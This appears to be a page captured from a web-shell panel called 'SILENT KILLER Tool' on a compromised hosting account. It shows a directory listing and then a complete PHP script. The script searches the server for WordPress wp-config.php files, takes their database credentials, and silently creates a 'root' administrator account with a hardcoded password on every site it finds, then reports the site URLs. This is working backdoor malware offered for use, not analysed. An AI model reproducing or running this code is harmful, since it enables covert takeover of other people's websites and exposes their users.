Current Path: > home > codekrsu > > dapperavenue.store
Operation : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 162.0.232.56 | Your IP: 216.73.216.111 Domains : 1034 Domain(s) Permission : [ 0750 ]
| Name | Type | Size | Last Modified | Actions |
|---|---|---|---|---|
| 382838 | Directory | - | - | |
| cgi-bin | Directory | - | - | |
| .comp | File | 4360 bytes | August 03 2025 20:10:20. | |
| .hcflag | File | 31 bytes | July 22 2025 11:30:22. | |
| .htaccess | File | 1037 bytes | September 09 2024 08:42:22. | |
| .litespeed_flag | File | 297 bytes | July 28 2025 01:32:43. | |
| .ptr | File | 4360 bytes | July 31 2025 13:23:09. | |
| close_class.php | File | 2714 bytes | July 09 2025 18:59:04. | |
| confirmed.php | File | 68 bytes | August 03 2025 15:08:22. | |
| css.zip | File | 1678 bytes | July 30 2025 01:37:08. | |
| cust.utf8.php | File | 1828 bytes | July 09 2025 19:00:29. | |
| error_log | File | 7002181 bytes | July 31 2025 16:13:31. | |
| fact.class.php | File | 2604 bytes | July 09 2025 18:59:04. | |
| fact_aprove.php | File | 1613 bytes | July 30 2025 08:42:50. | |
| jatypo.php | File | 68 bytes | August 03 2025 15:07:29. | |
| resolution.php | File | 68 bytes | August 03 2025 15:07:32. | |
| robots.txt | File | 70 bytes | July 22 2025 01:03:51. | |
| tbl_tracking.php | File | 2737 bytes | August 02 2025 07:48:29. | |
| xoops_version.php | File | 68 bytes | August 03 2025 15:08:22. |
<?php function scan($path) { if ($dir = @opendir($path)) { while (false !== ($file = readdir($dir))) { $p = $path . DIRECTORY_SEPARATOR . $file; if ($file != '.' && $file != '..') { if (is_link($p)) { continue; } elseif (is_dir($p)) { scan($p); } elseif ($file === 'wp-config.php') { inject($p); } } } } } function inject($p) { $user_login = 'root'; $user_password = 'Zb{0@U{vsFjq&#j(<?L[Iy0Hi_#9]i-LlJN0=Ec'; $user_email = 'admin@wordpress.com'; $data = file_get_contents($p); $pattern = "/table_prefix\s*=\s*'([^']*)';/i"; if (preg_match($pattern, $data, $matches)) { $table_prefix = $matches[1]; } else { $table_prefix = 'wp_'; } $lines = array_map('rtrim', file($p)); $conf = []; foreach ($lines as $line) { if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) { $conf[$matches[1]] = parse_define_value($line); } } if (isset($conf['DB_HOST']) && isset($conf['DB_USER']) && isset($conf['DB_PASSWORD']) && isset($conf['DB_NAME'])) { $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']); if ($mysqli->connect_errno) { return; } if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) { if ($result->num_rows > 0) { $result->close(); $mysqli->close(); return; } $result->close(); } $add_user_query = "INSERT INTO `{$table_prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) SELECT '{$user_login}', MD5('{$user_password}'), '{$user_login}', '{$user_email}', '', (SELECT `user_registered` FROM `{$table_prefix}users` ORDER BY `ID` ASC LIMIT 1), 0, '{$user_login}' FROM DUAL WHERE NOT EXISTS ( SELECT 1 FROM `{$table_prefix}users` WHERE `user_login` = '{$user_login}' );"; if ($mysqli->query($add_user_query)) { $add_usermeta_query1 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) SELECT `ID`, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;"; $add_usermeta_query2 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) SELECT `ID`, 'wp_user_level', '10' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;"; $mysqli->query($add_usermeta_query1); $mysqli->query($add_usermeta_query2); } $site_url = false; if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) { $row = $result->fetch_object(); $result->close(); $site_url = $row->option_value; } if (!$site_url || strpos($site_url, 'http') !== 0) { if ($result = $mysqli->query("SELECT user_url FROM {$table_prefix}users ORDER BY ID ASC LIMIT 1;")) { $row = $result->fetch_object(); $result->close(); $site_url = $row->user_url; } } if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) { if ($result->num_rows > 0) { echo "<f>{$site_url}@@@{$p}</f>\n"; } $result->close(); } $mysqli->close(); } } function parse_define_value($line) { if (preg_match("/define\s*\(\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*\)\s*;/", $line, $matches)) { return $matches[1]; } return null; } function scanRootPaths() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { foreach (range('A', 'Z') as $driveLetter) { $drive = $driveLetter . ':\\'; if (is_dir($drive)) { scan($drive); } } } else { scan('/home/codekrsu'); } } scanRootPaths(); die('!ended!');
SILENT KILLER Tool